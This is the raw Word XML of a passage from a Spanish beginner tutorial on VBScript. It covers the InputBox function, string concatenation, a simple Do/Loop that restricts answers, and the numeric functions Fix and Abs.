          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> donde aparecerá. Por otro lado, el cuadro de dialogo va también unido a una variable, que recibirá la respuest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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cuadro de dialogo básico</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sin determinar la posición en la que aparecerá, es decir, aparecerá centrado) se hace con el siguiente código (todo en la misma linea):</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InputBox(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"Pregunta del InputBox","Titulo del InputBox","Respuesta predetrminada")</w:t>
      </w:r>
    </w:p>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es el nombre de la variable que acompaña al </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>InputBox</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Pregunta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del InputBox es el mensaje que se muestra en el cuadro de dialogo, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Titulo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del InputBox es el titulo de este y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Respuesta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> predeterminada es la respuesta que aparecerá al principio, luego editable. Como vemos es una función de tres argumentos de cadena.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="26"/>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en la Pregunta del InputBox desea colocar comillas, saltos de línea o una referencia a otra variable (es decir, que muestre lo que tiene) debe realizarlo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>uniendo las expresiones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>símbolo de concatenación</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (&amp;) de la siguiente manera (la respuesta y el título son única y exclusivamente de una línea):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8654" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="1" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8654"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="604"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865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InputBox("Pregunta del InputBox"&amp;chr(13)&amp;"Mensaje2","Titulo del InputBox","Respuesta predeterminada")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="78"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8654" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="00000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578"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8654" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="sing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InputBox("Pregunta del InputBox"&amp;chr(34)&amp;"Mensaje2"&amp;chr(34),"Titulo del InputBox","Respuesta predeterminada")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="78"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8654" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="00000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854"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8654" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="sing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InputBox("Pregunta del InputBox "&amp;Variable2,"Titulo del InputBox","Respuesta predeterminada")</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quedará respectivamente así:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1474"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3648710" cy="4638040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3159" name="Picture 3159"/>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20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3648710" cy="4638040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En el primero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, hay dos mensajes en dos líneas. El mensaje uno esta unido con un símbolo de concatenación a una constante de VBScript que equivale a un salto de línea, y este, con otro símbolo de concatenación al segundo mensaje. Todo esto esta puesto en la zona del mensaje </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>separado de las demás con una coma</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En el segundo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay un mensaje y otro entre comillas. El mensaje uno esta unido con un símbolo de concatenación a la función Chr(x) que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>equivale a las comillas ("), y este, con otro símbolo de concatenación al mensaje dos. Después esta otra constante igual a la anterior unida con otro símbolo de concatenación para así cerrar las comillas que habíamos abierto anteriormente.</w:t>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En el tercero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> primero damos el valor dos a la variable "Variable2", aunque le podéis dar cualquier valor. Lugo ponemos un mensaje unido con un símbolo de concatenación a la variable "Variable2" lo cual nos mostrara solo su valor.</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 bastante sencillo, y muy parecido al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Además, si queremos posicionar el cuadro en la pantalla debemos de usar el siguiente códig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InputBox(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"Pregunta del InputBox","Titulo del InputBox","Respuesta predetrminada",0,0)</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el primer 0 es una expresión numérica que especifica, en twips, la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>distancia horizontal</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del borde izquierdo del cuadro de diálogo respecto al borde izquierdo de la pantalla. Si se omite, el cuadro de diálogo se centra horizontalmente. Y el segundo 0 es una expresión numérica que especifica, en twips, la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>distancia vertical</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del borde superior del cuadro de diálogo hasta la parte superior de la pantalla. Si se omite, el cuadro de diálogo se ubica verticalmente aproximadamente a un tercio de la parte inferior de la pantalla. Probadlo vosotros mismos y vereis…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>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stacar también que la Variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">guarda la respuesta enviada, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">si no se escribe nada o se pulsa cancelar la Variable guarda una cadena de longitud cero (""). De esa forma, combinándolo con un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 podemos devolver lo que ha colocado en la respuesta:</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InputBox(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">"¿Que comida te gusta?","Comida","Introduce comida favorita") Variable2 = MsgBox("Te gusta: "&amp;Variable,0,"Comida") </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dará como resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="836" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1512"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3600450" cy="3056890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3251" name="Picture 3251"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="3251" name="Picture 3251"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3600450" cy="3056890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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 pues grande el repertorio de posibilidades que esto ofrece, ya que por ejemplo puedes pedir que te digan “cuantos perros quieres contar” y luego contarlos con el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 y un bucle </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, por ejemplo. Las posibilidades dependen solo de tu imaginación y de nada más.</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último, para delimitar varias respuestas, se puede seguir el siguiente procedimiento mediante el uso de la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sentencia If</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u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sentencia Do</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>operaciones con Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8654" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="93" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5086"/>
        <w:gridCol w:w="3568"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1156"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5086"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spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="67" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Variable = InputBox("¿Qué te gusta mas, el Jamon, el Queso o el Atun?","Comida","Responde aquí") If Variable="Queso" Then</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="356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Creamos bucle.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="28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Preguntamos con un InputBox. Si la respuesta es Ques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obtiene valor ok</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="2536"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5086"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Jamon"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Atun"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Loop Until Variable2 = "ok"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3568" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>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in de la Condició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i la respuesta es Jamon:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="92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obtiene valor ok Fin de la Condición Si la respuesta es Atu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obtiene valor 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in de la Condició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alimos del bucle si Variable2= ok.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="896"/>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impedirá que desaparezca el cuadro de dialogo si no se contesta una de esas tres respuestas (Queso, Jamón o Atún). En </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>otras palabras, delimitas las contestaciones posibles, pudiendo crear así un sistema de claves o algo similar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="136"/>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Funciones Básicas</w:t>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isual Basic Script posee diversas clases de funciones básicas: las que operan con cadenas, con números, con valores boléanos y con tiempo. Las que operan con valores boléanos ya se han visto y tratado anteriormente. Pasemos pues a las que operan con valores numéricos, que son las más sencillas. Los valores numéricos que guardan las variables tienen varias funciones que los pueden modificar. Antes de empezar a ver las funciones, es recomendable que sepas ya bien </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single" w:color="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> variables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single" w:color="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Visual Basic Script  </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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primera función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función elimina la parte decimal de un número. Si no hay decimales lo deja como está. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8195" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2616"/>
        <w:gridCol w:w="5579"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2616"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4,567"</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Fix(</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57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el valor 4,567. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fix</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable, Variable2 obtiene el valor 4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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gunda función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Abs</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función devuelve el valor absoluto de un número. Si el número es positivo lo deja como está. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8577" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2682"/>
        <w:gridCol w:w="5895"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
